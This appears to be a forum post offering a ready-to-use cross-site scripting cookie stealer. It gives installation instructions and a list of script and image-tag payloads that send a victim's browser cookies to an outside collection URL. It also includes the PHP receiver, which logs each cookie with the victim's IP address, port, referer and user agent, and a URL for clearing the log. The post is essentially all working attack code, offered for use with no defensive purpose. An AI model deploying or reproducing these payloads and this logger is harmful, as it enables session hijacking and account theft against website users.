instruction.txt ( [Only registered and activated users can see links. Click Here To Register...] ):
log.php ( [Only registered and activated users can see links. Click Here To Register...] ):
Download:
[Only registered and activated users can see links. Click Here To Register...]
Code:
#################################################################################################### # Installation: #################################################################################################### German: Laden sie den Inhalt aus dem Ordner "upload" auf ihr Webverzeichnis hoch! English: Upload the content from the "upload" folder to your web directory! #################################################################################################### # Payloads: #################################################################################################### <img src="*" onerror="new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);" alt="" height="0" width="0" /> <script>document.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script> <script>location.href='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script> <script>new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script> <script>var x = new Image();x.src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script> <script>window.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script> #################################################################################################### # Clear logs #################################################################################################### http://own-server.net/test/log.php?clear=1
Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown"))
$ip = $_SERVER["REMOTE_ADDR"];
else
$ip = "unknown";
return ($ip);
}
function logData()
{
$ipLog = "data.log";
$cookie = $_SERVER["QUERY_STRING"];
$register_globals = (bool) ini_get("register_gobals");
if ($register_globals)
$ip = getenv("REMOTE_ADDR");
else
$ip = GetIP();
$rem_port = $_SERVER["REMOTE_PORT"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$rqst_method = $_SERVER["REQUEST_METHOD"];
$referer = $_SERVER["HTTP_REFERER"];
$date = date("d.m.Y - H:i:s");
$log = fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "####################################################################################################<br /># Date{ : } $date<br /># Cookie: $cookie<br /># IP: $ip<br /># Port: $rem_port<br /># Request-Method: $rqst_method<br /># Referer: $referer<br /># User-Agent: $user_agent <br />####################################################################################################<br /><br />");
else
fputs($log, "####################################################################################################\n# Date: $date\n# Cookie: $cookie\n# IP: $ip\n# Port: $rem_port\n# Request-Method: $rqst_method\n# Referer: $referer\n# User-Agent: $user_agent\n####################################################################################################\n\n");
fclose($log);
}
if (isset($_GET["cookie"]) && ($_GET["cookie"] != "")) {
logData();
} else {
}
if (isset($_GET["clear"]) && ($_GET["clear"] == "1")) {
$string = "";
$fp = fopen("data.log", "w");
fwrite($fp, $string);
fclose($fp);
} else {
}
exit();
?>
[Only registered and activated users can see links. Click Here To Register...]